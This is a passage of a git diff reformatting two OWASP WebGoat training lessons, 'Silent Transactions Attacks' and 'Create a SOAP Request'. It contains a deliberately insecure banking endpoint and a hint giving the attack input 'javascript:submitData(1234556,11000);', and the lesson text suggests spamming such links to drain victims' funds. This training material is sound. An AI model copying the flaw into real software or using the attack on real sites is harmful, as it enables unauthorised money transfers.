+			if (s.getParser().getRawParameter("from", "").equals("ajax"))
+			{
+				if (s.getParser().getRawParameter("confirm", "").equals("Confirm"))
+				{
+					String amount = s.getParser().getRawParameter("amount", "");
+					s.getResponse().setContentType("text/html");
+					s.getResponse().setHeader("Cache-Control", "no-cache");
+					PrintWriter out = new PrintWriter(s.getResponse().getOutputStream());
+					StringBuffer result = new StringBuffer();
+					result.append("<br><br>* Congratulations. You have successfully completed this lesson.<br>");
+					if (!amount.equals(""))
+					{
+						result.append("You have just silently authorized ");
+						result.append(amount);
+						result.append("$ without the user interaction.<br>");
+					}
+					result
+							.append("Now you can send out a spam email containing this link and whoever clicks on it<br>");
+					result.append(" and happens to be logged in the same time will loose their money !!");
+					out.print(result.toString());
+					out.flush();
+					out.close();
+					getLessonTracker(s).setCompleted(true);
+					return;
+				}
+				else if (s.getParser().getRawParameter("confirm", "").equals("Transferring"))
+				{
+					s.getResponse().setContentType("text/html");
+					s.getResponse().setHeader("Cache-Control", "no-cache");
+					PrintWriter out = new PrintWriter(s.getResponse().getOutputStream());
+					out.print("<br><br>The Transaction has Completed Successfully.");
+					out.flush();
+					out.close();
+					return;
+				}
+			}
+		} catch (Exception ex)
 		{
-		    s.getResponse().setContentType("text/html");
-		    s.getResponse().setHeader("Cache-Control", "no-cache");
-		    PrintWriter out = new PrintWriter(s.getResponse()
-			    .getOutputStream());
-		    out
-			    .print("<br><br>The Transaction has Completed Successfully.");
-		    out.flush();
-		    out.close();
-		    return;
+			ex.printStackTrace();
 		}
-	    }
-	}
-	catch (Exception ex)
-	{
-	    ex.printStackTrace();
+
+		Form form = new Form(getFormAction(), Form.POST).setName("form").setEncType("");
+
+		form.addElement(createContent(s));
+
+		setContent(form);
+
 	}
 
-	Form form = new Form(getFormAction(), Form.POST).setName("form")
-		.setEncType("");
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Current WebSession
+	 */
 
-	form.addElement(createContent(s));
+	protected Element createContent(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
+		String lineSep = System.getProperty("line.separator");
+		String script = "<script>"
+				+ lineSep
+				+ "function processData(){"
+				+ lineSep
+				+ " var accountNo = document.getElementById('newAccount').value;"
+				+ lineSep
+				+ " var amount = document.getElementById('amount').value;"
+				+ lineSep
+				+ " if ( accountNo == ''){"
+				+ lineSep
+				+ " alert('Please enter a valid account number to transfer to.')"
+				+ lineSep
+				+ " return;"
+				+ lineSep
+				+ "}"
+				+ lineSep
+				+ " else if ( amount == ''){"
+				+ lineSep
+				+ " alert('Please enter a valid amount to transfer.')"
+				+ lineSep
+				+ " return;"
+				+ lineSep
+				+ "}"
+				+ lineSep
+				+ " var balanceValue = document.getElementById('balanceID').innerHTML;"
+				+ lineSep
+				+ " balanceValue = balanceValue.replace( new RegExp('$') , '');"
+				+ lineSep
+				+ " if ( parseFloat(amount) > parseFloat(balanceValue) ) {"
+				+ lineSep
+				+ " alert('You can not transfer more funds than what is available in your balance.')"
+				+ lineSep
+				+ " return;"
+				+ lineSep
+				+ "}"
+				+ lineSep
+				+ " document.getElementById('confirm').value  = 'Transferring'"
+				+ lineSep
+				+ "submitData(accountNo, amount);"
+				+ lineSep
+				+ " document.getElementById('confirm').value  = 'Confirm'"
+				+ lineSep
+				+ "balanceValue = parseFloat(balanceValue) - parseFloat(amount);"
+				+ lineSep
+				+ "balanceValue = balanceValue.toFixed(2);"
+				+ lineSep
+				+ "document.getElementById('balanceID').innerHTML = balanceValue + '$';"
+				+ lineSep
+				+ "}"
+				+ lineSep
+				+ "function submitData(accountNo, balance) {"
+				+ lineSep
+				+ "var url = '"
+				+ getLink()
+				+ "&from=ajax&newAccount='+ accountNo+ '&amount=' + balance +'&confirm=' + document.getElementById('confirm').value; "
+				+ lineSep + "if (typeof XMLHttpRequest != 'undefined') {" + lineSep + "req = new XMLHttpRequest();"
+				+ lineSep + "} else if (window.ActiveXObject) {" + lineSep
+				+ "req = new ActiveXObject('Microsoft.XMLHTTP');" + lineSep + "   }" + lineSep
+				+ "   req.open('GET', url, true);" + lineSep + "   req.onreadystatechange = callback;" + lineSep
+				+ "   req.send(null);" + lineSep + "}" + lineSep + "function callback() {" + lineSep
+				+ "    if (req.readyState == 4) { " + lineSep + "        if (req.status == 200) { " + lineSep
+				+ "                   var result =  req.responseText ;" + lineSep
+				+ "			 var resultsDiv = document.getElementById('resultsDiv');" + lineSep
+				+ "				resultsDiv.innerHTML = '';" + lineSep + "				resultsDiv.innerHTML = result;" + lineSep
+				+ "        }}}" + lineSep + "</script>" + lineSep;
 
-	setContent(form);
+		ec.addElement(new StringElement(script));
+		ec.addElement(new H1("Welcome to WebGoat Banking System"));
+		ec.addElement(new BR());
+		ec.addElement(new H3("Account Summary:"));
 
-    }
+		Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(1).setWidth("70%").setAlign("left");
+		ec.addElement(new BR());
+		TR tr = new TR();
+		tr.addElement(new TD(new StringElement("Account Balance:")));
+		tr.addElement(new TD(new StringElement("<div id='balanceID'>" + CURRENT_BALANCE.toString() + "$</div>")));
+		t1.addElement(tr);
 
+		tr = new TR();
+		tr.addElement(new TD(new StringElement("Transfer to Account:")));
+		Input newAccount = new Input();
+		newAccount.addAttribute("id", "newAccount");
+		newAccount.setType(Input.TEXT);
+		newAccount.setName("newAccount");
+		newAccount.setValue("");
+		tr.addElement(new TD(newAccount));
+		t1.addElement(tr);
 
-    /**
-     * Description of the Method
-     * 
-     * @param s Current WebSession
-     */
+		tr = new TR();
+		tr.addElement(new TD(new StringElement("Transfer Amount:")));
+		Input amount = new Input();
+		amount.addAttribute("id", "amount");
+		amount.setType(Input.TEXT);
+		amount.setName("amount");
+		amount.setValue(0);
+		tr.addElement(new TD(amount));
+		t1.addElement(tr);
 
-    protected Element createContent(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-	String lineSep = System.getProperty("line.separator");
-	String script = "<script>"
-		+ lineSep
-		+ "function processData(){"
-		+ lineSep
-		+ " var accountNo = document.getElementById('newAccount').value;"
-		+ lineSep
-		+ " var amount = document.getElementById('amount').value;"
-		+ lineSep
-		+ " if ( accountNo == ''){"
-		+ lineSep
-		+ " alert('Please enter a valid account number to transfer to.')"
-		+ lineSep
-		+ " return;"
-		+ lineSep
-		+ "}"
-		+ lineSep
-		+ " else if ( amount == ''){"
-		+ lineSep
-		+ " alert('Please enter a valid amount to transfer.')"
-		+ lineSep
-		+ " return;"
-		+ lineSep
-		+ "}"
-		+ lineSep
-		+ " var balanceValue = document.getElementById('balanceID').innerHTML;"
-		+ lineSep
-		+ " balanceValue = balanceValue.replace( new RegExp('$') , '');"
-		+ lineSep
-		+ " if ( parseFloat(amount) > parseFloat(balanceValue) ) {"
-		+ lineSep
-		+ " alert('You can not transfer more funds than what is available in your balance.')"
-		+ lineSep
-		+ " return;"
-		+ lineSep
-		+ "}"
-		+ lineSep
-		+ " document.getElementById('confirm').value  = 'Transferring'"
-		+ lineSep
-		+ "submitData(accountNo, amount);"
-		+ lineSep
-		+ " document.getElementById('confirm').value  = 'Confirm'"
-		+ lineSep
-		+ "balanceValue = parseFloat(balanceValue) - parseFloat(amount);"
-		+ lineSep
-		+ "balanceValue = balanceValue.toFixed(2);"
-		+ lineSep
-		+ "document.getElementById('balanceID').innerHTML = balanceValue + '$';"
-		+ lineSep
-		+ "}"
-		+ lineSep
-		+ "function submitData(accountNo, balance) {"
-		+ lineSep
-		+ "var url = '" + getLink()
-		+ "&from=ajax&newAccount='+ accountNo+ '&amount=' + balance +'&confirm=' + document.getElementById('confirm').value; "
-		+ lineSep + "if (typeof XMLHttpRequest != 'undefined') {"
-		+ lineSep + "req = new XMLHttpRequest();" + lineSep
-		+ "} else if (window.ActiveXObject) {" + lineSep
-		+ "req = new ActiveXObject('Microsoft.XMLHTTP');" + lineSep
-		+ "   }" + lineSep + "   req.open('GET', url, true);" + lineSep
-		+ "   req.onreadystatechange = callback;" + lineSep
-		+ "   req.send(null);" + lineSep + "}" + lineSep
-		+ "function callback() {" + lineSep
-		+ "    if (req.readyState == 4) { " + lineSep
-		+ "        if (req.status == 200) { " + lineSep
-		+ "                   var result =  req.responseText ;"
-		+ lineSep
-		+ "			 var resultsDiv = document.getElementById('resultsDiv');"
-		+ lineSep + "				resultsDiv.innerHTML = '';" + lineSep
-		+ "				resultsDiv.innerHTML = result;" + lineSep
-		+ "        }}}" + lineSep + "</script>" + lineSep;
+		ec.addElement(t1);
+		ec.addElement(new BR());
+		ec.addElement(new BR());
 
-	ec.addElement(new StringElement(script));
-	ec.addElement(new H1("Welcome to WebGoat Banking System"));
-	ec.addElement(new BR());
-	ec.addElement(new H3("Account Summary:"));
+		ec.addElement(new PRE());
+		Input b = new Input();
+		b.setType(Input.BUTTON);
+		b.setName("confirm");
+		b.addAttribute("id", "confirm");
+		b.setValue("Confirm");
+		b.setOnClick("processData();");
+		ec.addElement(b);
 
-	Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(1)
-		.setWidth("70%").setAlign("left");
-	ec.addElement(new BR());
-	TR tr = new TR();
-	tr.addElement(new TD(new StringElement("Account Balance:")));
-	tr.addElement(new TD(new StringElement("<div id='balanceID'>"
-		+ CURRENT_BALANCE.toString() + "$</div>")));
-	t1.addElement(tr);
+		ec.addElement(new BR());
+		Div div = new Div();
+		div.addAttribute("name", "resultsDiv");
+		div.addAttribute("id", "resultsDiv");
+		div.setStyle("font-weight: bold;color:red;");
+		ec.addElement(div);
 
-	tr = new TR();
-	tr.addElement(new TD(new StringElement("Transfer to Account:")));
-	Input newAccount = new Input();
-	newAccount.addAttribute("id", "newAccount");
-	newAccount.setType(Input.TEXT);
-	newAccount.setName("newAccount");
-	newAccount.setValue("");
-	tr.addElement(new TD(newAccount));
-	t1.addElement(tr);
+		return ec;
+	}
 
-	tr = new TR();
-	tr.addElement(new TD(new StringElement("Transfer Amount:")));
-	Input amount = new Input();
-	amount.addAttribute("id", "amount");
-	amount.setType(Input.TEXT);
-	amount.setName("amount");
-	amount.setValue(0);
-	tr.addElement(new TD(amount));
-	t1.addElement(tr);
+	protected Category getDefaultCategory()
+	{
+		return Category.AJAX_SECURITY;
+	}
 
-	ec.addElement(t1);
-	ec.addElement(new BR());
-	ec.addElement(new BR());
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("Check the javascript in the HTML source.");
+		hints.add("Check how the application calls a specific javascript function to execute the transaction.");
+		hints.add("Check the javascript functions processData and submitData()");
+		hints.add("Function submitData() is the one responsible for actually ececuting the transaction.");
+		hints.add("Check if your browser supports running javascript from the address bar.");
+		hints.add("Try to navigate to 'javascript:submitData(1234556,11000);'");
+		return hints;
 
-	ec.addElement(new PRE());
-	Input b = new Input();
-	b.setType(Input.BUTTON);
-	b.setName("confirm");
-	b.addAttribute("id", "confirm");
-	b.setValue("Confirm");
-	b.setOnClick("processData();");
-	ec.addElement(b);
+	}
 
-	ec.addElement(new BR());
-	Div div = new Div();
-	div.addAttribute("name", "resultsDiv");
-	div.addAttribute("id", "resultsDiv");
-	div.setStyle("font-weight: bold;color:red;");
-	ec.addElement(div);
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
 
-	return ec;
-    }
+	/**
+	 * Gets the title attribute of the HelloScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Silent Transactions Attacks");
+	}
 
-
-    protected Category getDefaultCategory()
-    {
-	return Category.AJAX_SECURITY;
-    }
-
-
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints.add("Check the javascript in the HTML source.");
-	hints
-		.add("Check how the application calls a specific javascript function to execute the transaction.");
-	hints
-		.add("Check the javascript functions processData and submitData()");
-	hints
-		.add("Function submitData() is the one responsible for actually ececuting the transaction.");
-	hints
-		.add("Check if your browser supports running javascript from the address bar.");
-	hints.add("Try to navigate to 'javascript:submitData(1234556,11000);'");
-	return hints;
-
-    }
-
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    /**
-     *  Gets the title attribute of the HelloScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Silent Transactions Attacks");
-    }
-
-
-    public Element getCredits()
-    {
-	return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
-    }
+	public Element getCredits()
+	{
+		return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
+	}
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SoapRequest.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SoapRequest.java
index b9ecd06e9..6220ec8be 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/SoapRequest.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SoapRequest.java
@@ -1,9 +1,8 @@
 /*
- * Created on May 26, 2005
- *
- * TODO To change the template for this generated file go to
- * Window - Preferences - Java - Code Style - Code Templates
+ * Created on May 26, 2005 TODO To change the template for this generated file go to Window -
+ * Preferences - Java - Code Style - Code Templates
  */
+
 package org.owasp.webgoat.lessons;
 
 import java.sql.Connection;
@@ -12,7 +11,6 @@ import java.sql.ResultSet;
 import java.sql.SQLException;
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.html.A;
@@ -28,476 +26,454 @@ import org.owasp.webgoat.session.ParameterNotFoundException;
 import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.session.WebgoatContext;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
+ * 
  * @author asmolen
- *
- * TODO To change the template for this generated type comment go to
- * Window - Preferences - Java - Code Style - Code Templates
+ * 
+ * TODO To change the template for this generated type comment go to Window - Preferences - Java -
+ * Code Style - Code Templates
  */
 public class SoapRequest extends SequentialLessonAdapter
 {
 
-    public final static String firstName = "getFirstName";
+	public final static String firstName = "getFirstName";
 
-    public final static String lastName = "getLastName";
+	public final static String lastName = "getLastName";
 
-    public final static String loginCount = "getLoginCount";
+	public final static String loginCount = "getLoginCount";
 
-    public final static String ccNumber = "getCreditCard";
+	public final static String ccNumber = "getCreditCard";
 
-    //int instead of boolean to keep track of method invocation count
-    static int accessFirstName;
+	// int instead of boolean to keep track of method invocation count
+	static int accessFirstName;
 
-    static int accessLastName;
+	static int accessLastName;
 
-    static int accessCreditCard;
+	static int accessCreditCard;
 
-    static int accessLoginCount;
+	static int accessLoginCount;
 
 	private static WebgoatContext webgoatContext;
-	
+
 	/**
-	 * We maintain a static reference to WebgoatContext, since this class
-	 * is also automatically instantiated by the Axis web services module,
-	 * which does not call setWebgoatContext()
+	 * We maintain a static reference to WebgoatContext, since this class is also automatically
+	 * instantiated by the Axis web services module, which does not call setWebgoatContext()
 	 * (non-Javadoc)
+	 * 
 	 * @see org.owasp.webgoat.lessons.AbstractLesson#setWebgoatContext(org.owasp.webgoat.session.WebgoatContext)
 	 */
 	@Override
-	public void setWebgoatContext(WebgoatContext webgoatContext) {
+	public void setWebgoatContext(WebgoatContext webgoatContext)
+	{
 		SoapRequest.webgoatContext = webgoatContext;
 	}
-	
+
 	@Override
-	public WebgoatContext getWebgoatContext() {
+	public WebgoatContext getWebgoatContext()
+	{
 		return SoapRequest.webgoatContext;
 	}
 
-    protected Category getDefaultCategory()
-    {
-	return Category.WEB_SERVICES;
-    }
-
-
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints
-		.add("Accessible operations are delimited by the &lt;operation&gt; tag contained within the &lt;portType&gt; section of the WSDL. <BR> Below is an example of a typical operation (getFirstName): <br><br>"
-			+ "&lt;wsdl:portType name=\"SoapRequest\"&gt; <br>"
-			+ "&lt;wsdl:<strong>operation name=\"getFirstName\"</strong>&gt;<br>"
-			+ "&lt;wsdl:input message=\"impl:getFirstNameRequest\" name=\"getFirstNameRequest\" /&gt;<br>"
-			+ "&lt;wsdl:output message=\"impl:getFirstNameResponse\" name=\"getFirstNameResponse\" /&gt;<br>"
-			+ "&lt;wsdlsoap:operation soapAction=\"\" /&gt;"
-			+ "&lt;/wsdl:portType&gt;<br><br>"
-			+ "The methods invoked are defined by the input and output message attributes. "
-			+ "Example: <strong>\"getFirstNameRequest\"</strong>");
-	hints
-		.add("There are several tags within a SOAP envelope. "
-			+ "Each namespace is defined in the &lt;definitions&gt; section of the WSDL, and is declared using the (xmlns:namespace_name_here=\"namespace_reference_location_here\") format.<br><br>"
-			+ "The following example defines a tag \"&lt;xsd:\", whose attribute structure will reference the namespace location assigned to it in the declaration:<br>"
-			+ "<strong>xmlns:xsd=\"http://www.w3.org/2001/XMLSchema</strong>");
-	hints
-		.add("Determine what parameters and types are required by the message definition corresponding to the operation's request method. "
-			+ "This example defines a parameter (id) of type (int) in the namespace (xsd) for the method (getFirstNameRequest):<br>"
-			+ "&lt;wsdl:message name=\"getFirstNameRequest\"<br><br>"
-			+ "&lt;wsdl:<strong>part name=\"id\" type=\"xsd:int\"</strong> /&gt;<br>"
-			+ "&lt;/wsdl:message&gt;<br><br>"
-			+ "Examples of other types:<br>"
-			+ "{boolean, byte, base64Binary, double, float, int, long, short, unsignedInt, unsignedLong, unsignedShort, string}.<br>");
-	String soapEnv = "A SOAP request uses the following HTTP header: <br><br> "
-		+ "SOAPAction: some action header, can be &quot;&quot; <br><br>"
-		+ "The SOAP message body has the following format:<br>"
-		+ "&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt; <br>"
-		+ "&lt;SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" <br>"
-		+ "	                  xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" <br>"
-		+ "	                  xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"&gt; <br>"
-		+ "&nbsp;&nbsp;&lt;SOAP-ENV:Body&gt; <br>"
-		+ "&nbsp;&nbsp;&nbsp;&nbsp;&lt;ns1:getFirstName SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:ns1=\"http://lessons\"&gt; <br>"
-		+ "&nbsp;&nbsp;&nbsp;&nbsp;&lt;id xsi:type=\"xsd:int\"&gt;101&lt;/id&gt; <br>"
-		+ "&nbsp;&nbsp;&nbsp;&nbsp;&lt;/ns1:getFirstName&gt; <br>"
-		+ "&nbsp;&nbsp;&lt;/SOAP-ENV:Body&gt; <br>"
-		+ "&lt;/SOAP-ENV:Envelope&gt; <br><br>"
-		+ "Intercept the HTTP request and try to create a SOAP request.";
-	soapEnv.replaceAll("(?s) ", "&nbsp;");
-	hints.add(soapEnv);
-
-	return hints;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(100);
-
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    public String getTitle()
-    {
-	return "Create a SOAP Request";
-    }
-
-
-    protected Element makeOperationsLine(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	Table t1 = new Table().setCellSpacing(0).setCellPadding(2);
-
-	if (s.isColor())
+	protected Category getDefaultCategory()
 	{
-	    t1.setBorder(1);
+		return Category.WEB_SERVICES;
 	}
 
-	TR tr = new TR();
-	tr.addElement(new TD()
-		.addElement("How many operations are defined in the WSDL: "));
-	tr.addElement(new TD(new Input(Input.TEXT, "count", "")));
-	Element b = ECSFactory.makeButton("Submit");
-	tr.addElement(new TD(b).setAlign("LEFT"));
-	t1.addElement(tr);
-
-	ec.addElement(t1);
-
-	return ec;
-    }
-
-
-    protected Element makeTypeLine(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	Table t1 = new Table().setCellSpacing(0).setCellPadding(2);
-
-	if (s.isColor())
+	protected List<String> getHints(WebSession s)
 	{
-	    t1.setBorder(1);
+		List<String> hints = new ArrayList<String>();
+		hints
+				.add("Accessible operations are delimited by the &lt;operation&gt; tag contained within the &lt;portType&gt; section of the WSDL. <BR> Below is an example of a typical operation (getFirstName): <br><br>"
+						+ "&lt;wsdl:portType name=\"SoapRequest\"&gt; <br>"
+						+ "&lt;wsdl:<strong>operation name=\"getFirstName\"</strong>&gt;<br>"
+						+ "&lt;wsdl:input message=\"impl:getFirstNameRequest\" name=\"getFirstNameRequest\" /&gt;<br>"
+						+ "&lt;wsdl:output message=\"impl:getFirstNameResponse\" name=\"getFirstNameResponse\" /&gt;<br>"
+						+ "&lt;wsdlsoap:operation soapAction=\"\" /&gt;"
+						+ "&lt;/wsdl:portType&gt;<br><br>"
+						+ "The methods invoked are defined by the input and output message attributes. "
+						+ "Example: <strong>\"getFirstNameRequest\"</strong>");
+		hints
+				.add("There are several tags within a SOAP envelope. "
+						+ "Each namespace is defined in the &lt;definitions&gt; section of the WSDL, and is declared using the (xmlns:namespace_name_here=\"namespace_reference_location_here\") format.<br><br>"
+						+ "The following example defines a tag \"&lt;xsd:\", whose attribute structure will reference the namespace location assigned to it in the declaration:<br>"
+						+ "<strong>xmlns:xsd=\"http://www.w3.org/2001/XMLSchema</strong>");
+		hints
+				.add("Determine what parameters and types are required by the message definition corresponding to the operation's request method. "
+						+ "This example defines a parameter (id) of type (int) in the namespace (xsd) for the method (getFirstNameRequest):<br>"
+						+ "&lt;wsdl:message name=\"getFirstNameRequest\"<br><br>"
+						+ "&lt;wsdl:<strong>part name=\"id\" type=\"xsd:int\"</strong> /&gt;<br>"
+						+ "&lt;/wsdl:message&gt;<br><br>"
+						+ "Examples of other types:<br>"
+						+ "{boolean, byte, base64Binary, double, float, int, long, short, unsignedInt, unsignedLong, unsignedShort, string}.<br>");
+		String soapEnv = "A SOAP request uses the following HTTP header: <br><br> "
+				+ "SOAPAction: some action header, can be &quot;&quot; <br><br>"
+				+ "The SOAP message body has the following format:<br>"
+				+ "&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt; <br>"
+				+ "&lt;SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" <br>"
+				+ "	                  xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" <br>"
+				+ "	                  xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"&gt; <br>"
+				+ "&nbsp;&nbsp;&lt;SOAP-ENV:Body&gt; <br>"
+				+ "&nbsp;&nbsp;&nbsp;&nbsp;&lt;ns1:getFirstName SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:ns1=\"http://lessons\"&gt; <br>"
+				+ "&nbsp;&nbsp;&nbsp;&nbsp;&lt;id xsi:type=\"xsd:int\"&gt;101&lt;/id&gt; <br>"
+				+ "&nbsp;&nbsp;&nbsp;&nbsp;&lt;/ns1:getFirstName&gt; <br>" + "&nbsp;&nbsp;&lt;/SOAP-ENV:Body&gt; <br>"
+				+ "&lt;/SOAP-ENV:Envelope&gt; <br><br>"
+				+ "Intercept the HTTP request and try to create a SOAP request.";
+		soapEnv.replaceAll("(?s) ", "&nbsp;");
+		hints.add(soapEnv);
+
+		return hints;
 	}
 
-	TR tr = new TR();
-	tr
-		.addElement(new TD()
-			.addElement("Now, what is the type of the (id) parameter in the \"getFirstNameRequest\" method: "));
-	tr.addElement(new TD(new Input(Input.TEXT, "type", "")));
-	Element b = ECSFactory.makeButton("Submit");
-	tr.addElement(new TD(b).setAlign("LEFT"));
-	t1.addElement(tr);
+	private final static Integer DEFAULT_RANKING = new Integer(100);
 
-	ec.addElement(t1);
-
-	return ec;
-    }
-
-
-    protected Element createContent(WebSession s)
-    {
-	return super.createStagedContent(s);
-    }
-
-
-    protected Element doStage1(WebSession s) throws Exception
-    {
-	return viewWsdl(s);
-    }
-
-
-    protected Element doStage2(WebSession s) throws Exception
-    {
-	return determineType(s);
-    }
-
-
-    protected Element doStage3(WebSession s) throws Exception
-    {
-	return createSoapEnvelope(s);
-    }
-
-
-    protected Element viewWsdl(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	//DEVNOTE: Test for stage completion.
-	try
+	protected Integer getDefaultRanking()
 	{
-	    int operationCount = 0;
-	    operationCount = s.getParser().getIntParameter("count");
-
-	    if (operationCount == 4)
-	    {
-		getLessonTracker(s).setStage(2);
-		s.setMessage("Stage 1 completed.");
-
-		// Redirect user to Stage2 content.
-		ec.addElement(doStage2(s));
-	    }
-	    else
-	    {
-		s.setMessage("Sorry, that is an incorrect count. Try Again.");
-	    }
-	}
-	catch (NumberFormatException nfe)
-	{
-	    //DEVNOTE: Eat the exception.
-	    //ec.addElement( new P().addElement( nfe.getMessage() ) );
-	    s.setMessage("Sorry, that answer is invalid. Try again.");
-	}
-	catch (ParameterNotFoundException pnfe)
-	{
-	    //DEVNOTE: Eat the exception.
-	    // ec.addElement( new P().addElement( pnfe.getMessage() ) );
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+		return DEFAULT_RANKING;
 	}
 
-	//DEVNOTE: Conditionally display Stage1 content depending on whether stage is completed or not
-	if (getLessonTracker(s).getStage() == 1)
-	//if ( null == (getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE)) ||
-	//	(getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE)).equals("1") )
+	public String getTitle()
 	{
-	    ec.addElement(makeOperationsLine(s));
-
-	    A a = new A("services/SoapRequest?WSDL", "WebGoat WSDL File");
-	    ec
-		    .addElement(new P()
-			    .addElement("View the following WSDL and count available operations:"));
-	    ec.addElement(new BR());
-	    ec.addElement(a);
+		return "Create a SOAP Request";
 	}
 
-	//getLessonTracker( s ).setCompleted( SoapRequest.completed );
-
-	return (ec);
-    }
-
-
-    protected Element determineType(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	//DEVNOTE: Test for stage completion.
-	try
+	protected Element makeOperationsLine(WebSession s)
 	{
-	    String paramType = "";
-	    paramType = s.getParser().getStringParameter("type");
+		ElementContainer ec = new ElementContainer();
 
-	    //if (paramType.equalsIgnoreCase("int"))
-	    if (paramType.equals("int"))
-	    {
-		getLessonTracker(s).setStage(3);
-		s.setMessage("Stage 2 completed. ");
-		//s.setMessage("Now, you'll craft a SOAP envelope for invoking a web service directly.");
+		Table t1 = new Table().setCellSpacing(0).setCellPadding(2);
 
-		// Redirect user to Stage2 content.
-		ec.addElement(doStage3(s));
-	    }
-	    else
-	    {
-		s.setMessage("Sorry, that is an incorrect type. Try Again.");
-	    }
-	}
-	catch (ParameterNotFoundException pnfe)
-	{
-	    //DEVNOTE: Eat the exception.
-	    // ec.addElement( new P().addElement( pnfe.getMessage() ) );
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
-	}
-
-	//DEVNOTE: Conditionally display Stage2 content depending on whether stage is completed or not
-	if (getLessonTracker(s).getStage() == 2)
-	//if ( null == (getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE)) ||
-	//	(getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE)).equals("2") )
-	{
-	    ec.addElement(makeTypeLine(s));
-
-	    A a = new A("services/SoapRequest?WSDL", "WebGoat WSDL File");
-	    ec
-		    .addElement(new P()
-			    .addElement("View the following WSDL and count available operations:"));
-	    ec.addElement(new BR());
-	    ec.addElement(a);
-	}
-
-	//getLessonTracker( s ).setCompleted( SoapRequest.completed );
-
-	return (ec);
-    }
-
-
-    protected Element createSoapEnvelope(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	// Determine how many methods have been accessed. User needs to check at least two methods
-	// before completing the lesson.
-	if ((accessFirstName + accessLastName + accessCreditCard + accessLoginCount) >= 2)
-	{
-	    /** Reset function access counters **/
-	    accessFirstName = accessLastName = accessCreditCard = accessLoginCount = 0;
-	    //SoapRequest.completed = true;
-	    makeSuccess(s);
-	}
-	else
-	{
-
-	    // display Stage2 content
-	    ec
-		    .addElement(new P()
-			    .addElement("Intercept the request and invoke any method by sending a valid SOAP request for a valid account. <br>"));
-	    Element b = ECSFactory
-		    .makeButton("Press to generate an HTTP request");
-	    ec.addElement(b);
-
-	    // conditionally display invoked methods
